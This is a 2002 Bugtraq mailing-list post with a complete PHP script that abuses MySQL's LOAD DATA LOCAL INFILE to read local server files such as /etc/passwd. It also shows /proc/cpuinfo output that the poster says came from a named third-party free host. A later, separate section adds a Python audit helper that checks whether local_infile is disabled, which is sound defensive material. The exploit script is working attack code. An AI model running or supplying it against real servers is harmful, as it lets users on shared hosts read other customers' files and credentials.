Bugtraq mailing list archives

File reading vulnerable in PHP and MySQL (Local Exploit)


From: Hai Nam Luke <hainamluke () hotmail com>
Date: 26 Nov 2002 10:57:52 -0000



An attacker can use PHP and MySQL to read some local files in the following way:

# Create a database (MySQL) and upload this file to your server
PHP Code: viewfile.php (programmed by Luke)

======================================================
<?php
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd"; // filename that you wanna view

// shell code
echo "<pre>";

// an ordinary database account is enough: LOAD DATA LOCAL makes the
// client library (here, PHP on the web server) read the file, so the
// server-side FILE privilege is not involved
mysql_connect ($dbhost, $dbuser, $dbpasswd)
   or die ("CONNECT FAILED: " . mysql_error () . "\n");

$tbl = 'A' . time ();   // throwaway table name, unique per run
$sql = array (
   "USE $dbname",

   // a single LONGBLOB column can hold the whole file
   "CREATE TEMPORARY TABLE $tbl (a LONGBLOB)",

   // field/line terminators that never occur in the file, so the entire
   // file is stored as one row in one column
   "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);

foreach ($sql as $statement) {
   $query = mysql_query ($statement);

   if ($query == false) die (
      "FAILED: " . $statement . "\n" .
      "REASON: " . mysql_error () . "\n"
   );

   // only the SELECT returns a result set; the other statements return TRUE
   if (! $r = @mysql_fetch_array ($query, MYSQL_NUM)) continue;

   echo htmlspecialchars ($r[0]);
   mysql_free_result ($query);
}
echo "</pre>";
?>

======================================================

You'll receive all the source of /etc/passwd.

This vulnerability is very dangerous because a user can read some important
files on your server. Especially at any free host, a user can use a local
exploit to read the source code of other users and attack one another.

Example: I uploaded this file and configured it at http://members.lycos.co.uk/
and I received their file "/proc/cpuinfo":

==============================================================
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 8
model name      : Pentium III (Coppermine)
stepping        : 10
cpu MHz         : 997.531
cache size      : 256 KB
fdiv_bug        : no
hlt_bug         : no
f00f_bug        : no
coma_bug        : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 2
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
bogomips        : 1992.29

processor       : 1
vendor_id       : GenuineIntel
cpu family      : 6
model           : 8
model name      : Pentium III (Coppermine)
stepping        : 10
cpu MHz         : 997.531
cache size      : 256 KB
fdiv_bug        : no
hlt_bug         : no
f00f_bug        : no
coma_bug        : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 2
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
bogomips        : 1992.29
==============================================================

And many other files; please check your server!
Thanks to dodo. Sorry for my poor English!

Luke (HVA)
http://www.hackervn.net
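A defender-side check for the setting this post relies on, added here as an example; it is not the poster's code. The file read works only while the MySQL server honours LOAD DATA LOCAL INFILE, which is governed by the `local_infile` system variable: `local-infile=0` or `skip-local-infile` under `[mysqld]` turns it off, and `SHOW VARIABLES LIKE 'local_infile'` shows what a running server actually does (on the PHP side, the mysqli extension additionally has the `mysqli.allow_local_infile` ini setting). The script below parses a my.cnf fragment with MySQL's option-name rules (`-` and `_` are interchangeable, a bare `local-infile` means enabled, later lines override earlier ones) and interprets the SHOW VARIABLES row; both sample inputs are constructed, and the `audit` helper name is this example's own.

```python
"""Audit helper for the LOAD DATA LOCAL INFILE exposure described in the post.

Added example, not part of the original post. It checks the two things a
server operator controls: the [mysqld] section of my.cnf and the value a live
server reports for SHOW VARIABLES LIKE 'local_infile'. Sample inputs are
constructed for this example.
"""
import re
from typing import Iterable, List, Optional, Tuple

# MySQL option names accept '-' or '_'; a bare "local-infile" enables the
# feature, "skip-local-infile" disables it, and "=value" is parsed below.
_OPT = re.compile(r"^(skip[-_])?local[-_]infile(?:\s*=\s*(\S+))?$", re.IGNORECASE)
_OFF_VALUES = {"0", "off", "false"}


def local_infile_enabled_in_config(cnf_text: str) -> Optional[bool]:
    """Return True/False if [mysqld] sets local_infile, None if it is unset.

    Later lines override earlier ones, as in mysqld's own option handling.
    """
    section = None
    result = None
    for raw in cnf_text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()  # drop comments
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "mysqld":
            continue  # [client] or other sections do not change the server
        m = _OPT.match(line)
        if not m:
            continue
        skip, value = m.group(1), m.group(2)
        if skip:
            result = False
        elif value is None:
            result = True
        else:
            result = value.strip("\"'").lower() not in _OFF_VALUES
    return result


def local_infile_enabled_on_server(rows: Iterable[Tuple[str, str]]) -> bool:
    """Interpret (Variable_name, Value) rows from SHOW VARIABLES LIKE 'local_infile'."""
    for name, value in rows:
        if name.lower() == "local_infile":
            return value.strip().upper() == "ON"
    raise ValueError("server did not report local_infile")


def audit(cnf_text: str, rows: Iterable[Tuple[str, str]]) -> List[str]:
    """Combine both checks into a list of findings (empty list means hardened)."""
    findings = []
    cfg = local_infile_enabled_in_config(cnf_text)
    if cfg is None:
        findings.append("config: local_infile not set in [mysqld]; relying on the build default")
    elif cfg:
        findings.append("config: local-infile is enabled in [mysqld]")
    if local_infile_enabled_on_server(rows):
        findings.append("runtime: server reports local_infile=ON; LOAD DATA LOCAL INFILE is honoured")
    return findings


# Constructed samples: the weak setting beside the corrected one.
WEAK_CNF = """[mysqld]
datadir=/var/lib/mysql
local-infile=1   # any database account can pull files readable by the client
"""

HARDENED_CNF = """[mysqld]
datadir=/var/lib/mysql
local-infile=0
"""

if __name__ == "__main__":
    for label, cnf, rows in (("weak", WEAK_CNF, [("local_infile", "ON")]),
                             ("hardened", HARDENED_CNF, [("local_infile", "OFF")])):
        print(label, audit(cnf, rows) or ["ok"])
```

Run it as-is to see the two sample configurations scored; in practice feed it the real option file and the rows returned by the SHOW VARIABLES query. An empty findings list from `audit` is the state that makes the script in this post fail at the LOAD DATA step with a "command is not allowed" error instead of returning file contents.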

